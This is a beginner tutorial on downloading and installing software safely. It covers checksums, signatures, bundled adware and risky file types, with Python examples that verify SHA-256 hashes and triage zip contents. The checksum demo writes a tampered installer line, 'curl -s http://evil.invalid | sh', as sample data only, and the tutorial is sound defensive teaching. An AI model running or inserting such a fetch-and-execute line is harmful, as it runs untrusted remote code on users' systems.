INTERNET BASICS

Safe File Downloads and Software Installation

18 min read Beginner

Downloading files and installing software is something we do regularly, yet it remains one of the most common ways people accidentally introduce malware, adware, or unwanted programs onto their computers. In this tutorial, you will learn how to identify trustworthy download sources, verify file integrity, avoid bundled junk software, and follow safe installation practices that will keep your system clean and secure.

Official Sources vs. Third-Party Download Sites

The single most important rule for safe downloads is: always download software from official sources whenever possible. This means getting the software directly from the developer's website or from the official app store for your platform.

What Counts as an Official Source?

  • The developer's website -- For example, downloading Firefox from mozilla.org, VLC from videolan.org, or Python from python.org.
  • Official app stores -- Microsoft Store (Windows), Mac App Store (macOS), Google Play Store (Android), or Apple App Store (iOS). These stores review submissions and scan for malware, which raises the bar considerably, although malicious apps do occasionally slip through, so the permission checks later in this tutorial still apply.
  • Official repositories -- For Linux users, your distribution's package manager (apt, dnf/yum, pacman) pulls from repositories maintained by the distribution. Packages are cryptographically signed, and the package manager checks those signatures for you before installing anything.
  • GitHub/GitLab releases -- For open-source software, the official repository's "Releases" page is a trustworthy source, provided you confirm you are on the project's real repository (not a fork or a look-alike with a similar name) and that the release was published by its maintainers.

Why Third-Party Download Sites Are Risky

Third-party download sites like CNET's Download.com, Softonic, FileHippo, and similar aggregators have a troubled history. Many of these sites wrap legitimate software in their own installers that bundle additional programs -- toolbars, browser hijackers, or even adware. Even if the core software is legitimate, the wrapper around it may not be.

Warning: Be extremely cautious of any download site that uses a "Download" button that is actually an advertisement. Many third-party sites place ads that look like download buttons right next to the real download link. Always look carefully before clicking.

Some third-party sources are reputable. For example, ninite.com is a well-regarded service that lets you install multiple common programs at once without any bundled extras. The key is to research a source's reputation before trusting it.

Checking File Signatures and Checksums

Even when downloading from official sources, there is a small chance that the file could have been tampered with -- for example, if a download mirror or the developer's server was compromised, or if the file was corrupted in transit. This is where checksums and digital signatures come in. Keep in mind what each one can and cannot tell you: a checksum published on the same page as the download only proves that you received the file the page currently offers, because an attacker who replaced the file could replace the checksum as well. A digital signature, or a checksum obtained from a separate channel, is what protects you in that case.

What Is a Checksum?

A checksum (more precisely, a cryptographic hash) is a fixed-length string of characters computed from a file's contents. If even a single byte of the file changes, the checksum will be completely different, and with a modern algorithm it is computationally infeasible to craft a second file that produces the same checksum. Many software developers publish the checksum alongside their downloads so you can verify the file you downloaded matches exactly what they intended to distribute.

Common checksum types you will encounter are MD5, SHA-1, and SHA-256. MD5 and SHA-1 are both broken: researchers have demonstrated practical collisions for each, meaning an attacker can produce two different files that share the same MD5 or SHA-1 value. Treat them as a check against corrupted downloads only. SHA-256 (or SHA-512) is the standard today and is what you should look for; if a site publishes nothing stronger than MD5, rely on the digital signature instead where one is available.

How to Verify a Checksum

On Windows, open PowerShell and run:

Get-FileHash C:\Users\YourName\Downloads\setup.exe -Algorithm SHA256

On macOS or Linux, open Terminal and run:

sha256sum ~/Downloads/setup.tar.gz        # Linux
shasum -a 256 ~/Downloads/setup.dmg        # macOS

Compare the output with the checksum published on the developer's download page. They should match exactly; note that PowerShell prints the hash in uppercase and sha256sum in lowercase, which is not a mismatch. If the values differ, do not install the file -- delete it and download again from the official source. If the second download fails too, assume something is wrong with the source or with your network path rather than trying a third time.

Tip: Comparing a 64-character string by eye is error-prone, so let the computer do it where you can: if the developer provides a SHA256SUMS file, sha256sum can check every file listed in it for you, and in PowerShell you can compare the Hash property directly against the published value. If you must compare manually, read the whole string. Checking only the first and last few characters turns a 256-bit check into a 64-bit one and invites misreads, which matters most for operating system images and encryption tools, where a mistake is costly.
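The checks above carried out by a script rather than by eye, as an added example that is not part of this tutorial. It is plain Python so it runs unchanged on Windows, macOS and Linux; the sample "installer" and its published checksum line are constructed inline, in the same format a SHA256SUMS file uses, and the verifier accepts only SHA-256 or SHA-512 so an MD5 or SHA-1 line cannot be used by mistake.

```python
"""Verify a downloaded file against a published SHA-256 checksum.

Added example for the tutorial above; the sample file and the checksum
line are constructed here, not taken from any real download page.
"""
import hashlib
import hmac
import os
import tempfile

# Hash algorithms acceptable for an integrity check, with their hex length.
# MD5 and SHA-1 are deliberately absent: collisions exist for both.
TRUSTED_ALGORITHMS = {"sha256": 64, "sha512": 128}


def file_digest(path, algorithm="sha256", chunk_size=1 << 20):
    """Hash a file in chunks so a large installer need not fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_sums_file(text):
    """Parse sha256sum output ('<hex>  <filename>' per line) into a dict.

    Blank lines and '#' comments are ignored; a leading '*' on the filename
    (sha256sum's binary-mode marker) is stripped.
    """
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        name = name.strip().lstrip("*")
        if digest and name:
            entries[name] = digest
    return entries


def verify_download(path, expected_hex, algorithm="sha256"):
    """Return True only if the file's digest equals the published one.

    - Refuses weak algorithms instead of silently accepting them.
    - Rejects a truncated or malformed published value before hashing.
    - Normalises case: PowerShell prints uppercase hex, sha256sum lowercase.
    - Compares the full string with hmac.compare_digest (constant time).
    """
    if algorithm not in TRUSTED_ALGORITHMS:
        raise ValueError(f"{algorithm} is not acceptable for an integrity check")
    expected = expected_hex.strip().lower()
    if len(expected) != TRUSTED_ALGORITHMS[algorithm] or any(
        c not in "0123456789abcdef" for c in expected
    ):
        raise ValueError("published checksum is malformed or truncated")
    actual = file_digest(path, algorithm)
    return hmac.compare_digest(actual, expected)


def demo():
    """Constructed sample: a tiny installer script and the line its author would publish."""
    original = b"#!/bin/sh\necho 'installing example tool'\n"
    tampered = original + b"curl -s http://evil.invalid | sh\n"
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "setup.sh")
        with open(path, "wb") as f:
            f.write(original)
        # What the developer's download page would list for the clean file.
        published = f"{hashlib.sha256(original).hexdigest()}  setup.sh\n"
        sums = parse_sums_file(published)
        results = {
            "clean": verify_download(path, sums["setup.sh"]),
            # Same value pasted from PowerShell output (uppercase) still matches.
            "clean_uppercase": verify_download(path, sums["setup.sh"].upper()),
        }
        # Overwrite with the tampered content: one appended line breaks the match.
        with open(path, "wb") as f:
            f.write(tampered)
        results["tampered"] = verify_download(path, sums["setup.sh"])
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:16} verified: {ok}")
```

Run it as a script and it reports True for the untouched file (in either case) and False once a line has been appended. With a real download, call verify_download on the path and the value copied from the developer's page; the comparison it performs is the same one sha256sum -c does when you hand it the published checksum file.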

Digital Signatures

Digital signatures go a step further than checksums. They use cryptographic certificates to prove both that the file has not been modified and that it was signed by the holder of a particular certificate. On Windows, you can check a file's digital signature by right-clicking the file, selecting "Properties," then clicking the "Digital Signatures" tab, or by running Get-AuthenticodeSignature on the file in PowerShell. On macOS, Gatekeeper checks the signature and notarization of a downloaded app the first time you open it. For open-source projects that publish GPG signatures (.asc or .sig files), gpg --verify checks the download against the project's signing key. Two caveats apply. A valid signature only tells you who signed the file, so confirm that the publisher name is the developer you expect rather than an unfamiliar company; signed malware exists, produced with stolen or fraudulently obtained certificates, so a signature is strong evidence rather than absolute proof. And a signature that is missing or reported as invalid is a reason to stop, not to click through.

Browser Download Safety Features

Modern web browsers include several built-in safety features for downloads. Understanding these features helps you make informed decisions about the files you download.

Safe Browsing Warnings

Google Chrome and Mozilla Firefox use Google Safe Browsing, and Microsoft Edge uses Microsoft Defender SmartScreen, to check downloads and the sites they come from against lists of known malware. If you see a warning that a file is dangerous, take it seriously. While false positives occasionally occur, it is much safer to heed the warning and investigate further before proceeding.

Uncommon Download Warnings

You may also see warnings saying a file "is not commonly downloaded" or "may be dangerous." This does not necessarily mean the file is malicious -- it could simply be rare or new software. However, it does mean the file has not been widely verified by other users. Proceed with extra caution: verify the source, check the checksum if available, and scan the file with antivirus software before opening.

Automatic Scanning

Most browsers hand downloaded files to your system's antivirus (Microsoft Defender on Windows, for example), and Windows additionally tags files that came from the internet so that SmartScreen can warn you before an unrecognized installer runs. Let the scan complete before opening the file. If the scan finds something suspicious, quarantine or delete the file immediately.

Recognizing Bundled Malware and Unwanted Software

One of the most common threats when installing software is not outright malware but rather Potentially Unwanted Programs (PUPs). These are programs that sneak into the installation process of legitimate software and install themselves alongside it. They include browser toolbars, search engine hijackers, system "optimization" tools, and adware.

Red Flags During Installation

  • Pre-checked boxes -- Watch for checkboxes that are already checked, offering to install additional software, change your homepage, or set a new default search engine. Always uncheck these.
  • "Express" or "Recommended" installation -- These options often include bundled software. Always choose "Custom," "Advanced," or "Manual" installation when available, even if the installer says the recommended option is for "most users."
  • Decline/Skip buttons in unusual places -- Some installers present bundled offers in a way that makes the "Accept" button prominent and the "Decline" or "Skip" option small or hidden. Read every screen carefully.
  • Offers that look like required steps -- Some installers present bundled software as if it is part of the installation process. It is not. If a screen is offering you something new to install, you can always decline.
Warning: Free software that is ad-supported or funded through bundled offers is not always bad, but it requires you to pay close attention during installation. If a program bundles too many offers or makes them hard to decline, consider finding an alternative.

Safe Installation Practices

Follow these steps every time you install new software to minimize risk:

1. Research Before You Download

Before downloading any software, spend a minute searching for reviews and information about it. Search for the software name along with words like "review," "safe," or "malware." If multiple sources warn about the software, find an alternative.

2. Download from Official Sources Only

As discussed above, always prefer the developer's official website or your platform's app store. If you find software recommended on a blog or forum, go to the official website to download it rather than using the link provided.

3. Scan the File Before Running It

Before running any downloaded installer, scan it with your antivirus software. On Windows, you can right-click the file and select "Scan with Microsoft Defender" (or whatever antivirus you use). For extra assurance, you can upload the file to virustotal.com, which scans files against dozens of antivirus engines simultaneously.

Tip: VirusTotal (virustotal.com), a free service owned by Google, scans files and URLs against 70+ antivirus engines. You can upload files up to 650MB and get results in seconds, which makes it one of the most useful tools for checking a download, with two caveats. First, anything you upload is shared with the security community, so never upload documents that contain personal or confidential data; compute the file's SHA-256 and search VirusTotal for the hash instead. Second, a clean result is not proof of safety: a brand-new or targeted file may simply not have been seen by any engine yet, so combine the scan with the source and signature checks above.

4. Always Choose Custom Installation

When the installer gives you the choice between "Express/Quick" and "Custom/Advanced," always choose Custom. This lets you see exactly what will be installed and decline any extras. Read each screen of the installer carefully rather than clicking "Next" as fast as possible.

5. Check Permissions on Mobile

When installing apps on your phone, review the permissions the app requests. A flashlight app that asks for access to your contacts, camera, and location is requesting far more access than it needs, which is a significant red flag. Both Android and iOS allow you to review and revoke permissions after installation in your device settings.

6. Keep Software Updated

Once software is installed, keep it updated. Updates frequently include security patches that fix vulnerabilities discovered since the previous version. Enable automatic updates when possible, or check for updates regularly.

Dangerous File Types to Watch For

Not all file types carry the same risk. Here are the types that can execute code on your system and therefore pose the greatest threat:

High Risk (can execute code):
  .exe    - Windows executable
  .msi    - Windows installer package
  .bat    - Windows batch script
  .cmd    - Windows command script
  .ps1    - PowerShell script
  .vbs    - Visual Basic script
  .js     - JavaScript file (when run outside a browser)
  .jar    - Java application
  .scr    - Screensaver file (actually an executable)
  .dmg    - macOS disk image
  .app    - macOS application
  .sh     - Linux/macOS shell script
  .deb    - Linux Debian package
  .rpm    - Linux Red Hat package
  .apk    - Android app package

Medium Risk (can contain macros or exploits):
  .doc/.docm  - Word documents that can contain macros (.docx cannot)
  .xls/.xlsm  - Excel spreadsheets that can contain macros (.xlsx cannot)
  .pdf         - PDF files (rare, but can contain exploits)
  .zip/.rar    - Archives (can contain any of the above)
Warning: Be especially wary of email attachments with these file types. If you receive an unexpected file from someone -- even someone you know -- verify with them through another channel before opening it, since their account may have been compromised and used to send malicious files. Also be aware that Windows hides known file extensions by default, so a file named invoice.pdf.exe appears as "invoice.pdf" with a PDF-style icon; turn on "File name extensions" in File Explorer's View menu so you always see the real type.
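A small triage script for the list above, as an added example that is not part of this tutorial. It is plain Python, uses the same two risk tiers as the table, and goes a little beyond it in two ways: it flags double extensions such as invoice.pdf.exe, which Windows shows as "invoice.pdf" when extensions are hidden, and it opens .zip archives to classify their contents, since an archive is only as safe as its riskiest member. The archive it inspects is constructed in memory, and the list of "decoy" extensions used to spot double extensions is my own choice, not something the tutorial defines.

```python
"""Classify downloaded files and zip archive members by the risk tiers above.

Added example for the tutorial; the sample archive is built in memory and
the DECOY list is an assumption, not part of the original text.
"""
import io
import zipfile

HIGH_RISK = {".exe", ".msi", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".jar",
             ".scr", ".dmg", ".app", ".sh", ".deb", ".rpm", ".apk"}
MEDIUM_RISK = {".doc", ".docm", ".xls", ".xlsm", ".pdf", ".zip", ".rar"}
# Extensions commonly used as the harmless-looking half of a double extension.
DECOY = {".pdf", ".doc", ".docx", ".jpg", ".png", ".txt"}


def classify_name(name):
    """Return (level, reason) for one file name; level is 'high', 'medium' or 'low'."""
    base = name.lower().rsplit("/", 1)[-1]      # ignore directories inside an archive
    parts = base.split(".")
    if len(parts) < 2:
        return "low", "no extension"
    ext = "." + parts[-1]                        # the extension that actually decides how it runs
    if ext in HIGH_RISK:
        if len(parts) >= 3 and "." + parts[-2] in DECOY:
            decoy = "." + parts[-2]
            return "high", f"double extension: looks like {decoy} but runs as {ext}"
        return "high", f"{ext} can execute code"
    if ext in MEDIUM_RISK:
        return "medium", f"{ext} can carry macros or exploits"
    return "low", f"{ext} is not on the watch list"


def classify_zip(data):
    """Classify every file inside a zip archive given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            level, reason = classify_name(info.filename)
            findings.append((info.filename, level, reason))
    return findings


def worst_level(findings):
    """The archive inherits the risk of its riskiest member."""
    order = {"low": 0, "medium": 1, "high": 2}
    return max((level for _, level, _ in findings), key=order.get, default="low")


def build_sample_zip():
    """Constructed sample: a readme and a manual next to a disguised executable."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("README.txt", "thanks for downloading")
        zf.writestr("docs/manual.pdf", "%PDF-1.4 ...")
        # Shown as 'invoice.pdf' in Explorer when extensions are hidden.
        zf.writestr("invoice.pdf.exe", "MZ...")
    return buf.getvalue()


if __name__ == "__main__":
    findings = classify_zip(build_sample_zip())
    for name, level, reason in findings:
        print(f"{level:6}  {name:20}  {reason}")
    print("archive overall:", worst_level(findings))
```

Running the script lists each member with its tier and reason and reports the archive as high risk because of the disguised executable, even though two of its three members are harmless. Point classify_zip at the bytes of a real download to get the same report.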

What to Do If You Think You Are Infected

If you suspect your computer has been infected by something you downloaded, do not panic. Here is a step-by-step plan:

  1. Disconnect from the internet -- This prevents malware from communicating with external servers, spreading to other devices on your network, or downloading additional malicious components.
  2. Do NOT enter any passwords -- Until you have resolved the infection, avoid logging in to any accounts on the affected device. If the malware includes a keylogger, your credentials could be captured.
  3. Run a full antivirus scan -- Use your installed antivirus software to run a complete system scan (not a quick scan). If you do not have antivirus software installed, you can download free tools like Malwarebytes from a clean computer and transfer them via USB drive.
  4. Boot into Safe Mode -- If the malware prevents your antivirus from running normally, restart your computer in Safe Mode (on Windows: hold Shift while clicking Restart, then navigate to Troubleshoot > Advanced Options > Startup Settings, click Restart, and press 4 for Safe Mode or 5 for Safe Mode with Networking). Safe Mode loads only essential drivers and services, which often prevents malware from starting.
  5. Remove suspicious programs -- Open your system's program manager (Add or Remove Programs on Windows, Applications folder on macOS) and look for any programs you do not recognize or that were installed around the time the problems started. Uninstall them.
  6. Change your passwords -- After cleaning the infection, change your passwords for important accounts (email, banking, social media) from a different, clean device. Enable two-factor authentication if you have not already.
  7. Update everything -- Make sure your operating system, browser, and all software are up to date. The vulnerability that allowed the infection may have been patched in a recent update.
  8. Consider a fresh start -- If the infection is severe or you cannot be certain it is fully removed, backing up your important files and performing a clean reinstall of your operating system is the most thorough solution.
Tip: Prevention is always easier than cleanup. Maintain regular backups of your important files so that even in a worst-case scenario, you will not lose your data. Use an external hard drive, a cloud backup service, or both.

Key Takeaways

  • Always download software from official sources -- the developer's website or your platform's app store.
  • Verify downloaded files using checksums (SHA-256) when available, and check digital signatures on executable files.
  • Pay attention to your browser's download warnings and let antivirus scans complete before opening files.
  • Always choose Custom/Advanced installation and carefully decline bundled offers.
  • Be cautious with high-risk file types, especially those received via email.
  • If you suspect infection, disconnect from the internet, run a full scan, and change your passwords from a clean device.
  • Keep all software updated and maintain regular backups of your important data.

Downloading and installing software safely is not difficult, but it does require attention and good habits. By following the practices outlined in this tutorial, you will dramatically reduce your risk of encountering malware or unwanted software. Stay vigilant, stay updated, and when in doubt, do not click.